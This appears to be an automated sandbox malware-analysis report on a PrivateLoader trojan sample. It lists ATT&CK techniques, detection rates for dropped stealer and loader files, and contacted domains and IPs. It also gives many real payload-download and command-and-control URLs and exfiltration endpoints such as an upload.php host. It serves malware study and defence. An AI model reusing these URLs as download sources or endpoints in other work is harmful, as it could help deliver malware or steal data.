Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Native API	1 Windows Service	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	1 Access Token Manipulation	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	121 Registry Run Keys / Startup Folder	1 Windows Service	3 Obfuscated Files or Information	NTDS	258 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	611 Process Injection	1 Install Root Certificate	LSA Secrets	891 Security Software Discovery	SSH	Keylogging	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	4 Software Packing	Cached Domain Credentials	471 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	121 Registry Run Keys / Startup Folder	1 Timestomp	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Masquerading	/etc/passwd and /etc/shadow	3 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	471 Virtualization/Sandbox Evasion	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	611 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.PrivateLoader
SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	42%	Virustotal		Browse
SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	100%	Joe Sandbox ML
C:\ProgramData\DV Sample Construct 9.21.45\DV Sample Construct 9.21.45.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe	100%	Joe Sandbox ML
C:\ProgramData\jewkkwnf\jewkkwnf.exe	100%	Joe Sandbox ML
C:\ProgramData\AKEGHIJJEH.exe	79%	ReversingLabs	Win32.Spyware.Lummastealer
C:\ProgramData\AKEGHIJJEH.exe	70%	Virustotal		Browse
C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe	54%	ReversingLabs	Win64.Trojan.Privateloader
C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe	64%	Virustotal		Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\jewkkwnf\jewkkwnf.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.PrivateLoader
C:\ProgramData\jewkkwnf\jewkkwnf.exe	33%	Virustotal		Browse
C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)	42%	ReversingLabs	ByteCode-MSIL.Trojan.PrivateLoader
C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)	33%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Virustotal		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Virustotal		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.PrivateLoader
C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	33%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe	54%	ReversingLabs	Win64.Trojan.Privateloader
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe	64%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exe	79%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exe	70%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe	26%	ReversingLabs	Win32.Trojan.Cerbu
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe	40%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exe	62%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exe	56%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exe	13%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exe	26%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
s3-w.us-east-1.amazonaws.com	0%	Virustotal	Browse
tventyvf20pt.top	0%	Virustotal	Browse
cowod.hopto.org	1%	Virustotal	Browse
nwgrus.ru	1%	Virustotal	Browse
nerv.com.pe	6%	Virustotal	Browse
bitbucket.org	1%	Virustotal	Browse
api64.ipify.org	0%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
ipinfo.io	0%	Virustotal	Browse
bbuseruploads.s3.amazonaws.com	3%	Virustotal	Browse
iplogger.org	0%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection
s3-w.us-east-1.amazonaws.com	54.231.236.201	true	false	0%, Virustotal, Browse
bitbucket.org	185.166.143.48	true	false	1%, Virustotal, Browse
ckmqpoy.net	185.196.8.214	true	true
steamcommunity.com	23.197.127.21	true	true	0%, Virustotal, Browse
tventyvf20pt.top	5.53.124.195	true	true	0%, Virustotal, Browse
cowod.hopto.org	45.132.206.251	true	true	1%, Virustotal, Browse
ipinfo.io	34.117.59.81	true	false	0%, Virustotal, Browse
iplogger.org	172.67.74.161	true	false	0%, Virustotal, Browse
nerv.com.pe	162.241.61.218	true	false	6%, Virustotal, Browse
nwgrus.ru	62.150.232.50	true	true	1%, Virustotal, Browse
api64.ipify.org	173.231.16.77	true	false	0%, Virustotal, Browse
bbuseruploads.s3.amazonaws.com	unknown	unknown	true	3%, Virustotal, Browse

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
opponnentduei.shop	true
http://176.113.115.33/thebig/noode.exe	false
193.233.255.84:4284	true
quotamkdsdqo.shop	true
+tventyvf20pt.top	true
http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xin	false
chickerkuso.shop	true
https://116.203.165.127/softokn3.dll	true
analforeverlovyu.top	true
https://api64.ipify.org/?format=json	false
f20pt.top	true
http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1	false
http://nwgrus.ru/tmp/index.php	true
http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300	false
https://steamcommunity.com/profiles/76561199780418869	true
http://103.130.147.211/Files/1.exe	true
http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe	false
http://tech-servers.in.net/tmp/index.php	true
achievenmtynwjq.shop	true
http://unicea.ws/tmp/index.php	true

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	false
https://gcc.gnu.org/bugs/):	v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2815756662.00000000014A0000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe:80/sdhsfd.exe~at	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://176.113.115.33/thebig/noode.exeC:	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	false
http://tventyvf20pt.top/v1/upload.php)=	v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001301000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814299974.0000000001304000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe/sdhsfd.exez	RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp	false
http://tventyvf20pt.top/d	v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2814480702.0000000001318000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	false
http://176.111.174.109/kurwaC:	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://api64.ipify.org/;	RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe:80/sdhsfd.exei	RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/msal-client-apps	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://aka.ms/msal-net-enable-keychain-access	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
http://cowod.hopto.org_DEBUG.zip/c	LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/http	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
http://103.130.147.211/Files/1.exeC:	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://sso2urn:ietf:wg:oauth:2.0:oob	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	JxvL46JFox50ORU3tEsaxZ2Y.exe, 00000006.00000002.1888965030.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, LeVSNPB9FLpXmtLG7mcICpEf.exe, 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinxet	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/msal-net-up	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
http://schemas.xmlsoap.org/wsdl/soap12/shttp://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702iht	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
http://tventyvf20pt.top/v1/upload.php	v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1903774507.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.2011642105.0000000001317000.00000004.00000020.00020000.00000000.sdmp, v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000002.2813113714.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe:80/5.44.104/prog/66e705d09b33c_jack.exe	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe/vsfdhgg15.exe3t	RegAsm.exe, 00000002.00000002.1668271812.000000000455E000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe:80/vfsdgdf.exe6f	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://www.innosetup.com/	kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmp	false
https://api.ip.sb/ip	RK8ajtyf9pvKlaXEo3EjTbnu.exe, 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp	false
http://147.45.44.104/prog/66e705d09b33c_jack.exeC	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	kvOccCLzMNloI4W4GuGOaRuh.exe, kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66edb89bc4073_crypted.exe#xinC:	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/Issueshttp://schemas.xmlsoap.org/ws/2005/05/identity/NoP	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300xe	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://www.winimage.com/zLibDllm_object	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmp	false
https://ipinfo.io/	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmp	false
http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1)	RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66ed9885d9aee_Day2.exeC:	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe/vsfdhgg15.exeC:	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://ipinfo.io/https://ipgeolocation.io/::	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.000000000420F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1346588217.00000000041A4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false
https://ipinfo.io:443/widget/demo/8.46.123.33	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://bitbucket.org:80/kcatelin/jameson/downloads/easyfirewall.exek	RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe:80/	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://41.216.188.190:80/api/wp-ping.php	RegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe:80/vsfdhgg15.exe	RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004588000.00000004.00000020.00020000.00000000.sdmp	false
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000002.2791854958.0000000000401000.00000020.00000001.01000000.0000000B.sdmp	false
https://aka.ms/adal_token_cache_serialization	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://nerv.com.pe/vsfdhgg15.exe705d09	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://iplogger.org/	RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://176.111.174.109/kurwaS27	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/msal-net-iwa	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://aka.ms/msal-net-up)	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://ipgeolocation.io/	RegAsm.exe	false
http://41.216.188.190/api/wp-ping.php	RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1665943418.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe:80/vfsdgdf.exe	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000003.1914347955.00000000031FF000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/msal-net-enable-keychain-groups	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://aka.ms/msal-net-system-browsers	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://api64.ipify.org/?format=jsonO	RegAsm.exe, 00000002.00000002.1665943418.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp	false
https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exein	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://www.remobjects.com/psU	kvOccCLzMNloI4W4GuGOaRuh.exe, 00000008.00000003.1642645243.0000000001F58000.00000004.00001000.00020000.00000000.sdmp	false
https://login.microsoftonline.com/common/	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://aka.ms/msal-interactive-android	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://aka.ms/msal-brokers.	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://aka.ms/msal-net-2-released)	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
https://login.microsoftonline.com/common	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us300A	RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	false
http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1Ra	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://41.216.188.190/j	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://41.216.188.190/api/wp-admin.php9	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/net-cache-persistence-errors.	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1C:	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://aka.ms/msal-net-iwa	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
http://aka.ms/valid-authorities	Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	false
http://147.45.44.104/lopsa/66ebb3bf78bd6_Send.exe#111us3001	RegAsm.exe, 00000002.00000002.1668271812.0000000004520000.00000004.00000020.00020000.00000000.sdmp	false
https://nerv.com.pe:80/sdhsfd.exelfb	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false
http://41.216.188.190/g	RegAsm.exe, 00000002.00000002.1668271812.00000000045B3000.00000004.00000020.00020000.00000000.sdmp	false
https://api64.ipify.org:443/?format=json	RegAsm.exe, 00000002.00000002.1665943418.0000000000F5B000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.61.218	nerv.com.pe	United States	46606	UNIFIEDLAYER-AS-1US	false
176.113.115.33	unknown	Russian Federation	49505	SELECTELRU	false
116.203.165.127	unknown	Germany	24940	HETZNER-ASDE	true
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
45.202.35.101	unknown	Seychelles	139086	ONL-HKOCEANNETWORKLIMITEDHK	true
176.111.174.109	unknown	Russian Federation	201305	WILWAWPL	false
103.130.147.211	unknown	Turkey	63859	MYREPUBLIC-AS-IDPTEkaMasRepublikID	true
147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
185.196.8.214	ckmqpoy.net	Switzerland	34888	SIMPLECARRER2IT	true
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
54.231.236.201	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
172.67.74.161	iplogger.org	United States	13335	CLOUDFLARENETUS	false
193.233.255.84	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
41.216.188.190	unknown	South Africa	40676	AS40676US	false
185.166.143.48	bitbucket.org	Germany	16509	AMAZON-02US	false
23.197.127.21	steamcommunity.com	United States	20940	AKAMAI-ASN1EU	true
5.53.124.195	tventyvf20pt.top	Russian Federation	49505	SELECTELRU	true
173.231.16.77	api64.ipify.org	United States	18450	WEBNXUS	false
92.119.114.169	unknown	Ukraine	204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1514956
Start date and time:	2024-09-21 14:47:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@93/120@15/20
EGA Information:	Successful, ratio: 91.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.140, 40.126.32.72, 40.126.32.74, 20.190.160.17, 20.190.160.14, 20.190.160.20, 40.126.32.134, 184.28.90.27, 13.89.179.12, 20.189.173.20
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus15.westus.cloudapp.azure.com, questionmwq.shop, pool.hashvault.pro, sentistivowmi.shop, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, chickerkuso.shop, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target j6V5568MqaTghErAlfE30BBB.exe, PID 7888 because it is empty
Not all processes where analyzed, report is missing behavior information
